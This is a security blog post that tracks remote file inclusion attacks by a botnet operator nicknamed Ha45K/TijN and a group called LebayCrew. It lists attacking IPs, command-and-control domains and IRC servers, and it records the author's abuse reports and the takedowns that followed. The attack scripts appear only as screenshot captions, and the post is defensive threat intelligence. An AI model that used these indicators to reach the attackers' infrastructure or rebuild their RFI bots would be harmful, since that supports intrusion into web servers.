Ha45K / TijN botnets : RFI Attacks

I notice an icrease of the « generics attacks » on my website for the last days : http://www.malekal.com/modsec/ (blue line on the first graph).

A check show that some RFI attacks icreases.

few days ago :
http://www.malekal.com/modsec/index.php?ip=1.224.163.80
http://www.malekal.com/modsec/index.php?ip=71.6.150.241

Last attacks :
http://www.malekal.com/modsec/index.php?ip=46.252.18.54
http://www.malekal.com/modsec/index.php?ip=95.168.199.227

All the attacks against my websites (42 distinct IPs – so not so much) :
27.156.77.42
27.151.108.111
110.87.155.52
70.32.104.222
108.59.11.193
178.33.122.140
117.25.73.41
117.25.73.207
69.167.158.139
95.110.243.173
181.65.186.35
77.68.37.155
203.124.10.81
107.6.20.170
176.31.252.38
50.21.183.38
66.158.191.204
91.209.108.152
222.77.192.91
69.36.182.205
50.28.14.54
80.68.145.110
94.246.128.46
91.121.6.123
211.47.181.38
71.6.150.241
112.218.68.155
1.224.163.80
212.34.151.164
180.179.212.185
154.41.66.23
95.168.199.227
46.252.18.54
198.50.146.246
178.33.226.103
118.129.167.63
203.58.0.155
118.129.167.21

The RFI attacks was trying to make download a Perl script that connect to scary.angels-agency.nl

Ha45K_scarys_angels-agencythen it makes connect to 58.150.55.36 (also using the DNS ha45k.hopto.org)

Ha45K_rfi_attacks3

i sent an abuse for this.

Ha45K_scarys_angels-agency_abuse

in result  :

no-ip has moved : ha45k.hopto.org has address 0.0.0.0

and scary.angels-agency.nl is also suspended.
58.150.55.36 is still up.

Actually, the RFI attacks send a script to get informations from the victim server (and see if the RFI attack is successfull) :

Ha45K_rfi_sh

the bt.php is still around, and now connecting to 58.150.55.36 already mentionned in the abuse email  i sent.

Ha45K_rfi_bt

Some Shell Around :

Ha45K_rfi_attacks2

and the RFI Attacks sent by the botmaster :

Ha45K_rfi_attacks

 

The guy Ha45K seems to be active in HF forum and unknown.eu forum
He is also using the nickname TijN (use in the identd) : download.adamas.ai/dlbase/ezines/TeaMp0isoN/ezine1.txt
And doing this for a while now – April 2013 : https://defense.ballastsecurity.net/decoding/?raw=36173d0a9b460a8089d55086d39aa77d

Ha45K_TijN

 

EDIT – February 24

Seems Ha45K has read this entry and trying spam something :

Ha45K_spam

and some Spam Attacks :

Ha45K_spam3
We can see the Generics Attack peak : http://www.malekal.com/modsec/index.php
Ha45K_spam2

they move to 188.165.17.104 (OVH) and 62.109.4.70 (THEFIRST-NET – RU).
OVH has made the job and 188.165.17.104 is clean now.

btw another active RFI group : LebayCrew
http://www.malekal.com/modsec/index.php?ip=212.227.119.175
http://www.malekal.com/modsec/index.php?ip=203.58.0.155

IRCd : 212.19.3.130 (REDCOM-SRV-WEBHOST – RU)

lebay_crew_RFI

Some scans :

lebay_crew_RFI_scan

 

Sécuriser son site WEB

Vous pouvez aussi jeter un oeil à la page : [réseau] Sécuriser un serveur Apache/PHP/MySQL (LAMP) et l’index menant à différentes ressources pour sécuriser son site WEB

Comment lire d'autres tutoriels de malekal.com ?

Si le site vous a aidé, svp, débloquez les bloqueurs de publicités, n'hésitez pas non plus à partager l'article ou le site sur les réseaux sociaux.

Pour pouvoir lire plus d'articles et tutoriels, utilisez le menu en haut du site. Plein d'articles et tutos utiles vous attendent !

Besoin d'aide ?

Posez votre question ou soumettez votre problème sur le forum malekal.com pour obtenir une aide efficace : Aller sur le forum malekal.com
(Visited 15 times, 1 visits today)

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *